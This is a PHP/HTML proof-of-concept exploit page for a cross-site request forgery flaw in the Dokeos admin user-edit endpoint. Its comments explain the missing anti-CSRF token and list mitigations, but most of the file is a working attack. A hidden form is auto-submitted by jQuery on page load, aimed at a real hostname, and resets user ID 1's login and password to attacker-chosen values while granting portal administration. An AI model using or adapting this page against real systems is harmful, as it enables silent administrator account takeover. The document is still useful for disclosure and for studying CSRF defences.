<?php
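// This proof of concept triggers a cross-site request forgery (CSRF) submission to the main site.
// If a logged-in admin user loads this page, the attacker can change anyone's account
// information, including username and password.
// Root cause, as far as the replayed form shows: the only hidden fields are _qf__user_add
// (empty), user_id and MAX_FILE_SIZE, none of which is an unpredictable per-session token,
// so the endpoint apparently authorises the POST on the session cookie alone.
// Mitigation: require a per-session anti-CSRF token on every state-changing form, verify the
// Origin/Referer header server-side, set SameSite on the session cookie, and ask for the
// current password before a password change.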

// Host of the Dokeos installation the form is posted to; adjust per environment.
$hostname = 'www.dokeos.com';
// Admin user-edit endpoint used as the hidden form's action attribute.
$form_url = sprintf('https://%s/dokeos/main/admin/user_edit.php', $hostname);
// Value echoed into the form's "password" field; adjust per test.
$new_password = 'hacked_psw';
?>
<html>
  <head>
    <title>Third-Party CSRF Submission</title>
    <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
    <script>
        // Runs once the DOM is ready: a synthetic click on #submit_btn submits the
        // hidden (display:none) form, so the cross-site POST is sent without any
        // action by the visitor. The browser attaches the visitor's session cookie
        // to that POST unless the cookie is marked SameSite=Lax or Strict, which is
        // why the server must also check a per-session token rather than rely on
        // user interaction or on the cookie alone.
        $(document).ready(function() {
            $('#submit_btn').trigger('click');
        });
    </script>
    <!--
    -->
  </head>
  <body>
  <!-- <h1># You are hacked # Redirecting to the User Listing page</h1> -->
  <form style="width: 60%; float: left; display:none;" action="<?php echo $form_url ?>" method="post" name="user_add" id="user_add" enctype="multipart/form-data"> <div class="row"> <div class="label"> <span class="form_required">*</span> Last Name </div> <div class="formw"> <input name="lastname" type="text" value="Doe"> </div> </div> <div class="row"> <div class="label"> <span class="form_required">*</span> First Name </div> <div class="formw"> <input name="firstname" type="text" value="John"> </div> </div> <div class="row"> <div class="label">Official Code </div> <div class="formw"> <input size="40" name="official_code" type="text" value="ADMIN"> </div> </div> <div class="row"> <div class="label"> <span class="form_required">*</span> E-mail </div> <div class="formw"> <input size="40" name="email" type="text" value="webmaster@localhost.localdomain"> </div> </div> <div class="row"> <div class="label">Phone number </div> <div class="formw"> <input name="phone" type="text"> </div> </div> <div class="row"> <div class="label">Add a picture </div> <div class="formw"> <input name="picture" type="file"> </div> </div> <div class="row"> <div class="label"> <span class="form_required">*</span> Login </div> <div class="formw"> <input maxlength="20" name="username" type="text" value="student"> </div> </div> <div class="row"> <div class="label">password </div> <div class="formw"> <input name="reset_password" value="0" type="radio" id="qf_c2f4ec"><label for="qf_c2f4ec">Don't reset password</label> </div> </div> <div class="row"> <div class="label"> </div> <div class="formw"> <input name="reset_password" value="1" type="radio" id="qf_b93227"><label for="qf_b93227">Automattically generate a new password</label> </div> </div> <div class="row"> <div class="label"> </div> <div class="formw"> <input name="reset_password" value="2" type="radio" id="qf_5f6abd" checked><input name="password" type="password" value="<?php echo $new_password ?>"> </div> </div> <div class="row"> <div 
class="label">Status </div> <div class="formw"> <select name="status"> <option value="1" selected="selected">course manager</option> <option value="5">student</option> </select> </div> </div> <div class="row"> <div class="label">Portal Administration </div> <div class="formw"> <input name="platform_admin" value="1" type="radio" id="qf_7e38b3" checked="checked"><label for="qf_7e38b3">Yes</label>&nbsp;<input name="platform_admin" value="0" type="radio" id="qf_848c0e"><label for="qf_848c0e">No</label> </div> </div> <div class="row"> <div class="label">Send mail to new user </div> <div class="formw"> <input name="send_mail" value="1" type="radio" id="qf_330d5a"><label for="qf_330d5a">Yes</label>&nbsp;<input name="send_mail" value="0" type="radio" id="qf_881d69" checked="checked"><label for="qf_881d69">No</label> </div> </div> <div class="row"> <div class="label">Registration date </div> <div class="formw"> 2014-01-10 11:53:01 </div> </div> <div class="row"> <div class="label"> </div> <div class="formw"> <input name="submit" value="OK" type="submit" id="submit_btn"> </div> </div> <div class="row"> <div class="label"></div> <div class="formw"><span class="form_required">*</span> <small>required field</small></div> </div><input name="_qf__user_add" type="hidden" value=""> <input name="user_id" type="hidden" value="1"> <input name="MAX_FILE_SIZE" type="hidden" value="2097152"> <div class="clear"> &nbsp; </div> </form>
  </body>
</html>
